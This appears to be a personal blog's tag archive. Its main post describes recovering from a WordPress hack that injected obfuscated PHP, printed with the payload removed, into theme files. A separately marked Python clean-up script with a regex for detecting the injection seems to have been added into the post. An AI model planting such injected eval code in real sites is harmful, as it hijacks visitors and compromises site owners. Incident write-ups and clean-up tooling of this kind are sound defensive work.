Tag Archives: Mac Pro

WordPress + Google Search Result links redirected/hijacked/hacked

A couple weeks ago it was brought to my attention that when googling myself and then clicking on the Google search links, users were redirected to various spam websites instead of the actual website they wanted to visit. Since I don’t google myself to visit my personal & freelance websites (I visit them directly by typing the URL into the address bar), I was entirely unaware of this problem.

I started troubleshooting this problem by googling the keywords to all the websites I host. For every WordPress website that I hosted, the google search links were hijacked and redirected to spam sites. For any static HTML pages that I hosted, the google search links took me to the correct website.

This told me that every single one of my WordPress websites had been hacked and infected with a script. In fact, when troubleshooting, I discovered that not only was it the root level (home page) of the site, but all the sitelinks (the sub links shown underneath the main search result) had been infected as well. To me, this meant that the “virus” was at least in the header.php file of the WP install.

Coincidentally, I had just made the decision to switch hosting providers. I have been with BlueHost since June 2009 and honestly have never had any negative experiences. Within the past year, my work had a hugely negative experience with BlueHost. Long story short, all of our websites hosted with them vanished into the aether. This included all of our WordPress installs and our web team’s wiki. Their response to our trouble ticket was something along the lines of something blew up, nothing we can do, surely you understand. Fortunately, we do not understand and we do understand that rolling us to a backup is a reasonable expectation that they failed to see or execute. This experience terrifies me since I provide hosting for freelance clients. If their websites vanished one day with NO BACKUP, well… I’d be f’ed. As a consequence of this experience, I waited until my BlueHost hosting plan was close to expiration and then bought new hosting with DreamHost (recommended to me by a few coworkers).

Back to the hacked WordPress sites. I deduced that at the very least my header.php files were hacked, and they likely became that way because of a lack of security with my hosting provider as well as very slightly out of date WordPress installations. I needed to check my WP files on the server and then migrate all my domains and hosting off of BlueHost.

Saturday morning I checked my WP files. I began by checking index.php at the root level of the install and then in the wp-content subdirectories. EVERY SINGLE opening PHP tag was followed by this nastiness:

<?php eval(base64_decode("[base64 payload removed]")); ?>

Then, I checked my header.php file. EVERY SINGLE PHP tag was followed with this code. Literally every time my WP theme opens PHP to use a WP template tag, nasty infection virus code. Literally, metadata, keywords, title, everything, everything.

Obviously I’d been googling to troubleshoot this problem. All the google results were forums, blogs, discussion groups, etc talking about Norton, McAfee, Spider-something, and all other anti-virus software. Well it was obvious to me that the problem was not on my machine (I tested on my work Mac Pro, my home MacBook Pro, and my iPad) but on my server area. My wise husband said, “Hun, put ‘Mac’ on the end of your search.” Goodness sakes that was silly of me. Bam, I throw ‘Mac’ on the end of my search and all of a sudden I see the forums saying that it’s a server problem. That brilliant idea spurred another brilliant idea. I google the nasty infection code (shown above). Looky what I found:
Another poor soul whose WordPress site got hacked. He explains his solution to the problem here.

The bare bones “non-technical” solution that I thought of is to export your WP data to xml then re-import the data on a fresh WordPress installation. The probability of this solution working was confirmed by the link above. A few caveats or things to keep in mind…

  • Change hosting providers, and if you can afford it, opt for private hosting (shared hosting is the cheapest and it’s where they put you on a box with other people). If it happened to you once, it will happen to you again. Hubby suggested that it could be someone else that’s on the same box as me infecting everyone on the box. So even if I deleted my WP installs & did a fresh install, it is possible that the files would get hacked all over again within minutes.
  • Change your theme. All the installed themes are going to be infected too. Luckily I was running a child theme of 2011 and my child theme only had two php files with a small amount of customization. If you must keep the same theme, which I felt like I needed to, remove the virus code from the appropriate files, download locally, and zip up so you have a clean version of the theme you’re running.

The highly technical solution is to run a command line script on the server that finds all the files that have the virus code in them and duplicates all the files but without that code. Then it kills all the files that have the code. My command line juju is severely lacking and I’m terrified of that black box screen. This solution was mentioned in the two posts that guided me (linked above) and the actual script and nitty gritty details can be found here: http://tech.sarathdr.com/featured/wordpress-hacked-redirect-to-gigop-americanunfinished-com
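The clean-up that paragraph describes, sketched in Python as an added example (not the script from the linked post, and not the author's code): it finds `.php` files containing the injected block in the form shown earlier and, instead of deleting the infected originals, copies them to a quarantine directory before rewriting them. The function names, the quarantine layout and the sample files are assumptions made for illustration.

```python
import base64
import re
import shutil
import tempfile
from pathlib import Path

# The injected block in the form shown in the post: <?php eval(base64_decode("...")); ?>
# Assumption: whitespace and quote style may vary between infected files.
INJECTED = re.compile(
    rb"<\?php\s*eval\s*\(\s*base64_decode\s*\(\s*([\"'])[A-Za-z0-9+/=\s]*\1"
    rb"\s*\)\s*\)\s*;\s*\?>",
    re.IGNORECASE,
)

def clean_tree(root, quarantine, apply=False):
    """Return {relative path: injected block count} for *.php files under root.
    With apply=True, copy each infected original into quarantine, then
    rewrite the file in place without the injected blocks."""
    root, quarantine = Path(root), Path(quarantine)
    report = {}
    for path in sorted(root.rglob("*.php")):
        cleaned, count = INJECTED.subn(b"", path.read_bytes())
        if count == 0:
            continue
        rel = path.relative_to(root)
        report[rel.as_posix()] = count
        if apply:
            dest = quarantine / rel
            dest.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(path, dest)  # keep the infected original as evidence
            path.write_bytes(cleaned)
    return report

def demo():
    """Build a constructed two-file theme, do a dry run, then clean it."""
    payload = base64.b64encode(b"/* constructed, harmless */").decode()
    bad = '<?php eval(base64_decode("%s")); ?>' % payload
    with tempfile.TemporaryDirectory() as tmp:
        site, jail = Path(tmp, "site"), Path(tmp, "quarantine")
        theme = site / "wp-content" / "themes" / "child"
        theme.mkdir(parents=True)
        header = theme / "header.php"
        header.write_text(bad + "<?php wp_head(); ?>\n" + bad + "<title>x</title>\n")
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n")
        dry = clean_tree(site, jail)  # report only, nothing modified
        evals_after_dry = header.read_text().count("eval(")
        fixed = clean_tree(site, jail, apply=True)
        return dry, fixed, evals_after_dry, header.read_text(), clean_tree(site, jail)
```

Run it with `apply=False` first and review the report. Removing the block does not fix whatever let the files be modified, so the fresh install described in the post remains the safer route.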

I am ECSTATIC to report that downloading the XML export, downloading my child theme files, editing and then zipping my clean child theme files, changing hosting providers, doing a fresh WordPress install, uploading my XML, and reinstalling my clean child theme left me with a nearly perfect migration of my old website.

The only problem that I experienced is that some of my post images did not migrate over. What I did to work around that was download my entire folder from my old site and then upload the entire directory on my new server space. The image URLs within posts no longer returned 404s, woot woot! The only problem is that none of my [gallery] shortcodes work. I thought it was because the images are not linked to the post gallery, but my entire media library is empty. Frankly… I said eff it. At least all my data is here, my single images are here, my google search links take users to me, if I lose a few galleries… well that is a price that I am willing to pay.

“The application Finder can’t be opened.”

Grr. This is the second time this has happened to me. I work on Snow Leopard at home and at work, but now twice at work I’ve gotten this fatal message:

“The application Finder can’t be opened.” -10810

I can’t remember what I was doing the first time it happened, but when it happened just now, I was attempting to delete 4 or 5 directories on a shared server. The directories were NOT huge; it shouldn’t have crashed Finder. But it did. I had to force quit Finder and then when I tried to open it again, I got that crappy error message.

But I found a solution via the googler.

  1. Open Terminal. For those who are scared to open Terminal, don’t worry I’m in the same boat. I promise it will be okay.
  2. Type this in to Terminal:
    /System/Library/CoreServices/Finder.app/Contents/MacOS/Finder &
  3. Hit Enter.
  4. Now the first time I hit enter, my Finder window popped open. I was happy, so I closed the Finder window & Terminal. Then I clicked on Finder in the dock, and I got that damn error again.

    So, second time through, I started over at Step #1 and repeated the process. The second time that I hit enter (Step #3), the Finder window did not open automatically. But the Finder icon in the dock had the bottom light, so I clicked on it and a Finder window popped open. Phew!

    But then I closed Terminal. When you go to close Terminal, it closes your Finder. Boo.

    Third time through, repeat all steps. Finder automatically opens when I hit enter this time. Hit up the googler again to find a fix.

  5. Type this in to Terminal: disown
  6. Hit Enter.
  7. Now close Terminal and your Finder should still stay open.

Wow… That was a huge bear. Hope Apple fixes that bug.

Many thanks to this person:
and this person:

Cool snow leopard video on NYT

Check out this sweet video that describes OS updates with an easy-to-understand visual aesthetic. It focuses on Snow Leopard and why it is so innovative in the world of OS updates. Sweet stuff.

BTW, yesterday Mark went out and bought the Snow Leopard update for our Mac Pro at home. I didn’t have time to check it out when I got off of work yesterday, but he said it’s quite sweet and everything is A LOT faster.

Moving over to a new blog…

Well, Mark and I got married (YAY!!!) and I’m slowly getting all my ducks in a row and changing all of their names, buying new domain names, and moving over all the info, data, and blog posts possible. It’s been a hassle and I just started an hour ago. At least I started changing the fun stuff first, like web stuff, before I really tackle the painful things. Like waiting in line at the Social Security office. And then driving ALL THE WAY ACROSS MADISON to go wait in another line at the DMV. But I don’t plan on tackling the painful things until we return to Wisconsin from Samoa…in one month and 3 days from now. I’m counting down the days until we leave and today it’s at 18 days until we leave for Colorado and 22 days until we leave for Samoa. I need to get a lot of stuff done between now and then, so wish me luck!

Anyways. Here are some ramblings from a blog I had on WordPress about a year ago and then another blog I had on a website I made with iWeb more recently: